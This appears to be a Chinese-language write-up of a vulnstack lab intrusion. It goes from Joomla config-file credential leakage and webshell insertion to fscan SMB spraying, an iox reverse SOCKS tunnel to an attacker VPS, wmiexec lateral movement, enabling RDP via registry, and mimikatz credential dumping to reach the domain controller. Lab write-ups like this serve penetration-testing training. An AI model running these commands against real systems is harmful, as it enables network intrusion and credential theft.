环境下载
http://vulnstack.qiyuanxuetang.net/vuln/detail/5/
网络搭建
Centsos 默认192.18.93.100,图片IP地址有误
添加WMnet2 网络,仅主机模式,子网IP 192.168.93.0
web渗透
web_centsos ,ubuntu
开放的端口
80,22,3306
dirsearch扫描
工具地址:https://github.com/maurosoria/dirsearch
命令:
python3 dirsearch.py -u http://192.168.0.101/ -e*
扫描出来 /configuration.php~
配置文件,文件内容有数据账户密码
testuser cvcvgjASD!@
在am2zu_users
表添加管理员用户
$2y$10$EJ64ugc3YEnGH2jaM06XCO68igbTx4LpkcfVPnzoJHRy8Wm8h0Hti 123456
在am2zu_user_usergroup_map
配置权限
joomal后台写shell
使用添加的管理员账户登录后台
http://192.168.0.101/administrator/index.php test 123456
在index.php 添加一句话语句
保存访问首页,然后连接蚁剑
在/tmp/mysql/test.txt
文件中存有ssh用户密码
adduser wwwuser
passwd wwwuser_123Aqx
ssh wwwuser@192.168.0.101
登录上去ssh后,发现两个ip不一样,使用了nginx反向代理
内网渗透
fscan内网扫描
将fscan上传到192.168.93.100机器上去,扫描内网smb
./fscan_386 -h 192.168.93.0/24 -pwdf 2.txt -m smb
(icmp) Target 192.168.93.1 is alive
(icmp) Target 192.168.93.10 is alive
(icmp) Target 192.168.93.20 is alive
(icmp) Target 192.168.93.30 is alive
(icmp) Target 192.168.93.100 is alive
(icmp) Target 192.168.93.120 is alive
[*] Icmp alive hosts len is: 6
192.168.93.30:445 open
192.168.93.1:445 open
192.168.93.20:445 open
192.168.93.10:445 open
[*] alive ports len is: 4
start vulscan
[+] SMB:192.168.93.30:445:administrator 123qwe!ASD
[+] SMB:192.168.93.20:445:administrator 123qwe!ASD
搭建socks5隧道 iox
使用iox工具来搭建隧道
攻击机vps监听
iox.exe proxy -l 9999 -l 1080
内网机器执行命令,192.168.0.102为攻击机ip
./iox proxy -r 192.168.0.102:9999
建立连接
Proxifier
使用Proxifier工具来配置socks5
wmiexec 连接smb
wmiexec.exe administrator:123qwe!ASD@192.168.93.30
wmiexec.exe administrator:123qwe!ASD@192.168.93.20
开启3389端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
开启了3389后,使用administrator账户登录,为了方便文件传输,在登录3389时,设置本地资源-> 驱动器
administrator:123qwe!ASD@192.168.93.30
administrator:123qwe!ASD@192.168.93.20
使用mimikatz读取密码
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> mimi.txt
获取到域控管理员密码
Session : Interactive from 2
User Name : Administrator
Domain : TEST
Logon Server : WIN-8GA56TNV3MV
Logon Time : 2019/12/15 13:24:56
SID : S-1-5-21-1528753600-3951244198-520479113-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : TEST
* LM : fc5d63d71569f04399b419bc76e2eb34
* NTLM : 18edd0cc3227be3bf61ce198835a1d97
* SHA1 : 0f058e319f079c15fe3449bbeffc086cfa4d231e
tspkg :
* Username : Administrator
* Domain : TEST
* Password : zxcASDqw123!!
wdigest :
* Username : Administrator
* Domain : TEST
* Password : zxcASDqw123!!
kerberos :
* Username : Administrator
* Domain : TEST.ORG
* Password : zxcASDqw123!!
ssp :
credman :
使用wmiexec 登录域控
wmiexec.exe administrator:zxcASDqw123!!@192.168.93.10